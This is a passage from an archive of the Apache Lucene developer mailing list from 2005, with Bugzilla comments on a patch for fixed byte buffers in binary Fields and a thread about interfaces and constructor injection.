[email protected] Received: (qmail 40361 invoked by uid 500); 18 Mar 2005 03:10:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40342 invoked by uid 500); 18 Mar 2005 03:10:42 -0000 Delivered-To: [email protected] Received: (qmail 40338 invoked by uid 99); 18 Mar 2005 03:10:42 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 19:10:41 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2I3AcbE012224 for <[email protected]>; Fri, 18 Mar 2005 04:10:38 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2I3Aaen012222; Fri, 18 Mar 2005 04:10:36 +0100 Date: Fri, 18 Mar 2005 04:10:36 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34066] - [PATCH] Extension to binary Fields that allows fixed byte buffer X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34066>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34066 ------- Additional Comments From [email protected] 2005-03-18 04:10 ------- Chuck - would you mind also contributing a test case that exercises this new feature? It'd be nice if all new code added is covered by test cases. One of these days we'll even run code coverage on it to see how well we're doing :) -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 18 08:44:25 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23913 invoked from network); 18 Mar 2005 08:44:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 18 Mar 2005 08:44:24 -0000 Received: (qmail 67263 invoked by uid 500); 18 Mar 2005 08:44:22 -0000 Delivered-To: [email protected] Received: (qmail 67236 invoked by uid 500); 18 Mar 2005 08:44:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67222 invoked by uid 500); 18 Mar 2005 08:44:22 -0000 Delivered-To: [email protected] Received: (qmail 67216 invoked by uid 99); 18 Mar 2005 08:44:22 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Fri, 18 Mar 2005 00:44:20 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2I8iIWH010166 for <[email protected]>; Fri, 18 Mar 2005 09:44:18 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2I8iHtH010162; Fri, 18 Mar 2005 09:44:17 +0100 Date: Fri, 18 Mar 2005 09:44:17 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34066] - [PATCH] Extension to binary Fields that allows fixed byte buffer X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34066>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34066 ------- Additional Comments From [email protected] 2005-03-18 09:44 ------- Erik -- I'd be happy to write a test case. But first, I want to fully understand the valid uses and dangers of this patch. Since it is reusing memory, it is possible to mess up seriously. I think its javadoc at least needs more explanation of the dangers and an "expert" caveat. It's apparent simplicity lulled me into submitted it too quickly. Will revise later. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 18 15:22:25 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47907 invoked from network); 18 Mar 2005 15:22:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 18 Mar 2005 15:22:25 -0000 Received: (qmail 20081 invoked by uid 500); 18 Mar 2005 15:22:23 -0000 Delivered-To: [email protected] Received: (qmail 20048 invoked by uid 500); 18 Mar 2005 15:22:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20033 invoked by uid 99); 18 Mar 2005 15:22:22 -0000 X-ASF-Spam-Status: No, hits=0.9 required=10.0 tests=FORGED_RCVD_HELO,FROM_HAS_MIXED_NUMS,SPF_HELO_PASS,SPF_PASS,WEIRD_PORT X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from iceman.iq-computing.de (HELO iceman.iq-computing.de) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Fri, 18 Mar 2005 07:22:20 -0800 Received: (qmail 7994 invoked from network); 18 Mar 2005 16:22:17 +0100 Received: from d086018.adsl.hansenet.de (HELO wolverine.hh.iq-computing.de) ([email protected]) by iceman.iq-computing.de with AES256-SHA encrypted SMTP; 18 Mar 2005 16:22:17 +0100 Received: (qmail 11699 invoked from network); 18 Mar 2005 16:22:17 +0100 Received: from localhost (HELO ?161.129.204.104?) (161.129.204.104) by localhost with SMTP; 18 Mar 2005 16:22:17 +0100 Message-ID: <[email protected]> Date: Fri, 18 Mar 2005 16:22:17 +0100 From: Maik Schreiber <[email protected]> User-Agent: Mozilla Thunderbird 1.0 (X11/20041227) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: Interfaces References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 161.129.204.104 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: text/plain; charset=US-ASCII; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N > However, the primary focus of > Lucene is and always will be performance. It would be important to > demonstrate that resource utilization and performance are not adversely > affected by such changes. I can't see why interfaces should affect performance or resource utilization in a tangible way. For interface calls, the resulting bytecode would use invokeinterface instead of invokevirtual calls, but the speed difference is absolutely negligible (in the range of 500 nanoseconds per call at most during my tests with JDK 1.5.0_02 and JProfiler 3.3). Resource utilization would take up some bytes for the additional interfaces and generated code from the JIT compiler, but that's about it. -- Maik Schreiber * http://www.blizzy.de GPG public key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1F11D713 Key fingerprint: CF19 AFCE 6E3D 5443 9599 18B5 5640 1F11 D713 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 18 16:08:53 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76874 invoked from network); 18 Mar 2005 16:08:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 18 Mar 2005 16:08:53 -0000 Received: (qmail 25743 invoked by uid 500); 18 Mar 2005 16:08:50 -0000 Delivered-To: [email protected] Received: (qmail 25706 invoked by uid 500); 18 Mar 2005 16:08:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 25691 invoked by uid 99); 18 Mar 2005 16:08:49 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=WEIRD_PORT X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Fri, 18 Mar 2005 08:08:48 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id 6A3EE13E200A; Fri, 18 Mar 2005 11:08:44 -0500 (EST) Received: from [161.129.204.104] (d-128-167-231.bootp.Virginia.EDU [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id 34C5113E2120 for <[email protected]>; Fri, 18 Mar 2005 11:07:12 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: Interfaces Date: Fri, 18 Mar 2005 11:02:52 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-3.2 required=5.0 tests=AWL,BAYES_00,WEIRD_PORT autolearn=no version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I didn't mean to imply that using interfaces themselves were a potential performance issue.... what I meant was all the IoC mechanisms that might be tossed in as factory overhead to construct things indirectly. Erik On Mar 18, 2005, at 10:22 AM, Maik Schreiber wrote: >> However, the primary focus of Lucene is and always will be >> performance. It would be important to demonstrate that resource >> utilization and performance are not adversely affected by such >> changes. > > I can't see why interfaces should affect performance or resource > utilization in a tangible way. > > For interface calls, the resulting bytecode would use invokeinterface > instead of invokevirtual calls, but the speed difference is absolutely > negligible (in the range of 500 nanoseconds per call at most during my > tests with JDK 1.5.0_02 and JProfiler 3.3). > > Resource utilization would take up some bytes for the additional > interfaces and generated code from the JIT compiler, but that's about > it. > > -- > Maik Schreiber * http://www.blizzy.de > > GPG public key: > http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1F11D713 > Key fingerprint: CF19 AFCE 6E3D 5443 9599 18B5 5640 1F11 D713 > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 19 04:35:11 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76169 invoked from network); 19 Mar 2005 04:35:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2005 04:35:11 -0000 Received: (qmail 66221 invoked by uid 500); 19 Mar 2005 02:45:46 -0000 Delivered-To: [email protected] Received: (qmail 66191 invoked by uid 500); 19 Mar 2005 02:45:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 66178 invoked by uid 500); 19 Mar 2005 02:45:45 -0000 Delivered-To: [email protected] Received: (qmail 66175 invoked by uid 99); 19 Mar 2005 02:45:45 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Fri, 18 Mar 2005 18:45:44 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2J2jfaG026586 for <[email protected]>; Sat, 19 Mar 2005 03:45:41 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2J2jeqj026584; Sat, 19 Mar 2005 03:45:40 +0100 Date: Sat, 19 Mar 2005 03:45:40 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34066] - [PATCH] Extension to binary Fields that allows fixed byte buffer X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34066>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34066 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- Attachment #14514|0 |1 is obsolete| | ------- Additional Comments From [email protected] 2005-03-19 03:45 ------- Created an attachment (id=14521) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14521&action=view) (1 of 2) Patch to Field.java to support lengths on binary values (with better javadoc) This version improves the javadoc to provide and "expert" caveat and specify the precise use-case that this patch supports. For this use-case (storing a single large binary field on each Document, e.g. the externally compressed body of a document), the memory allocation benefits are substantial. There are no code changes from the original version. I'll try to get to a junit test in the not too distant future. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 19 12:33:13 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81319 invoked from network); 19 Mar 2005 12:33:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2005 12:33:13 -0000 Received: (qmail 29818 invoked by uid 500); 19 Mar 2005 12:33:11 -0000 Delivered-To: [email protected] Received: (qmail 29794 invoked by uid 500); 19 Mar 2005 12:33:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29778 invoked by uid 99); 19 Mar 2005 12:33:10 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from web54301.mail.yahoo.com (HELO web54301.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Sat, 19 Mar 2005 04:33:09 -0800 Received: (qmail 7212 invoked by uid 60001); 19 Mar 2005 12:33:07 -0000 Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; b=VC7YjQT/YnpPg++KvHedRgQtoJGYaHPy8b2lZpJfGLRqVZAlpkw0Ka76mzFUyr9zXSOfEUzTzwJ7Z+i0dSbs1ByZHSg0KkoAShhnlg1ltHvN7mH+7ODhrxiBslOlirr4CanwPhvfYtmC0KFk7YG4zVF43i2mW0GS9VjInoDghes= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web54301.mail.yahoo.com via HTTP; Sat, 19 Mar 2005 04:33:07 PST Date: Sat, 19 Mar 2005 04:33:07 -0800 (PST) From: Konstantin Priblouda <[email protected]> Subject: Re: Interfaces To: [email protected] In-Reply-To: 6667 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --- Erik Hatcher <[email protected]> wrote: > I didn't mean to imply that using interfaces > themselves were a > potential performance issue.... what I meant was all > the IoC mechanisms > that might be tossed in as factory overhead to > construct things > indirectly. Eric, I was not proposing IoC mechanism inside of Lucene ( though it may give some advantages ) - I was proposing to make key objects like directories , indices and analyzers more IoC friendly ( as Picocontainer commiter and user I'm lobbying for constructor injection ) Changes to lucene would be to provide publicly accesible meaningfull constructors - and not only factories / singletons ) While it's possible to code around and create pico-adapter classes, I'd rather see that lib designers jst provide constructors. It makes life for eveerybody easier. regards, ----[ Konstantin Pribluda ( ko5tik ) ]---------------- Plugins for xdoclet-2 are released. check it out at: http://www.sourceforge.net/projects/xdoclet-plugins/ ----[ http://www.pribluda.de ]------------------------ __________________________________ Do you Yahoo!? Yahoo! Small Business - Try our new resources site! http://smallbusiness.yahoo.com/resources/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Mar 20 16:28:38 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76337 invoked from network); 20 Mar 2005 16:28:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Mar 2005 16:28:38 -0000 Received: (qmail 81157 invoked by uid 500); 20 Mar 2005 16:28:36 -0000 Delivered-To: [email protected] Received: (qmail 81131 invoked by uid 500); 20 Mar 2005 16:28:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81117 invoked by uid 500); 20 Mar 2005 16:28:35 -0000 Delivered-To: [email protected] Received: (qmail 81114 invoked by uid 99); 20 Mar 2005 16:28:35 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sun, 20 Mar 2005 08:28:34 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2KGSVCW007523 for <[email protected]>; Sun, 20 Mar 2005 17:28:31 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2KGSVxj007520; Sun, 20 Mar 2005 17:28:31 +0100 Date: Sun, 20 Mar 2005 17:28:31 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33472] - [PATCH] disable coord for generated BooleanQueries X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33472>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33472 ------- Additional Comments From [email protected] 2005-03-20 17:28 ------- The BooleanScorer2 can be simplified heavily when there is no coordination needed. Basically all makeCountingSumScorer.. methods could be renamed to makeSumScorer.. and the private Coordinator class is unnecessary in that case. I'll start working on a non coordinating version, perhaps as a superclass of BooleanScorer2. Meanwhile the 'flat' coord method in Similarity will do fine. Regards, Paul Elschot -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 22 18:04:12 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93582 invoked from network); 22 Mar 2005 18:04:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Mar 2005 18:04:12 -0000 Received: (qmail 51380 invoked by uid 500); 22 Mar 2005 18:04:12 -0000 Delivered-To: [email protected] Received: (qmail 50912 invoked by uid 500); 22 Mar 2005 18:04:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50890 invoked by uid 500); 22 Mar 2005 18:04:10 -0000 Delivered-To: [email protected] Received: (qmail 50880 invoked by uid 99); 22 Mar 2005 18:04:10 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 22 Mar 2005 10:04:08 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2MI45we012480 for <[email protected]>; Tue, 22 Mar 2005 19:04:05 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2MI44Tl012476; Tue, 22 Mar 2005 19:04:04 +0100 Date: Tue, 22 Mar 2005 19:04:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34028] - FieldSortedHitQueue.lessThan() should not be final X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34028>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34028 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- Status|NEW |RESOLVED Resolution| |FIXED ------- Additional Comments From [email protected] 2005-03-22 19:04 ------- I think this 'final' was just another cut-and-pasted relic from the days when 'final' sometimes made things faster. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 22 21:23:06 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73684 invoked from network); 22 Mar 2005 21:23:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Mar 2005 21:23:06 -0000 Received: (qmail 26504 invoked by uid 500); 22 Mar 2005 21:22:58 -0000 Delivered-To: [email protected] Received: (qmail 26218 invoked by uid 500); 22 Mar 2005 21:22:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 25853 invoked by uid 500); 22 Mar 2005 21:22:54 -0000 Delivered-To: [email protected] Received: (qmail 25725 invoked by uid 99); 22 Mar 2005 21:22:54 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 22 Mar 2005 13:22:53 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2MJMk0Y026823 for <[email protected]>; Tue, 22 Mar 2005 20:22:46 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2MIJabI015127; Tue, 22 Mar 2005 19:19:36 +0100 Date: Tue, 22 Mar 2005 19:19:36 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34066] - [PATCH] Extension to binary Fields that allows fixed byte buffer X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34066>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34066 ------- Additional Comments From [email protected] 2005-03-22 19:19 ------- Things would be safer if you: private int fieldsDataLength = -1; public int binaryLength() { return fieldsDataLength == -1 ? binaryValue().length : fieldsDataLength; } public Field(String name, byte[] value, int length, Store store) { if (length < 0 || length > value.length) throw new IllegalArgumentException("bad length:" + length); ... } No? -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 23 01:45:57 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79771 invoked from network); 23 Mar 2005 01:45:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2005 01:45:57 -0000 Received: (qmail 81655 invoked by uid 500); 23 Mar 2005 01:45:56 -0000 Delivered-To: [email protected] Received: (qmail 81212 invoked by uid 500); 23 Mar 2005 01:45:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81198 invoked by uid 500); 23 Mar 2005 01:45:55 -0000 Delivered-To: [email protected] Received: (qmail 81195 invoked by uid 99); 23 Mar 2005 01:45:55 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 22 Mar 2005 17:45:54 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2N1jp1O030611 for <[email protected]>; Wed, 23 Mar 2005 02:45:51 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2N1jonL030607; Wed, 23 Mar 2005 02:45:50 +0100 Date: Wed, 23 Mar 2005 02:45:50 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34066] - [PATCH] Extension to binary Fields that allows fixed byte buffer X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34066>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34066 ------- Additional Comments From [email protected] 2005-03-23 02:45 ------- I don't see how the first change (initializing fieldsDataLength to -1 and testing it in binaryLength()) provides any additional safety. The patch always initializes fieldsDataLength in Field() for any binary value, so unless that was changed the value would never be -1 in binaryLength(). The main risk in this area of the code is that somebody calls binaryValue() without calling binaryLength() to get the length, which seems impossible to address. Another risk is that somebody calls binaryLength() on a non-binary field -- the current patch returns null in that case, consistent with binaryValue(), while the changed version would get an NPE. I'm probably missing some other case that you see. The second change (validating the length passed to Field()) seems an improvement. But the biggest risk with this patch is the one I outlined in the Javadoc, i.e. that somebody passes the same byte array in two different calls to Field before the use in the first call is consumed (e.g., 2 fields in the same Document, or the same field in 2 Documents before either is indexed). I don't see a good way to protect against that (without a performance hit). The patch is a bit risky due to this last consideration, but the performance gain is substantial in the particular case where it is necessary to store large document bodies in Lucene. I'm indexing with this now and doing zero allocations by using nio ByteBuffer and CharBuffer views on a fixed byte array that holds the successive document bodies. It rips. I'm using compression outside of Lucene (using the same zlib). The combination of outside-compression and the patch reduces 5 allocations of each document body to 0, when compared to passing the bodies as text and letting Lucene do the compression (the biggest part of this is the outside-compression). I don't object to 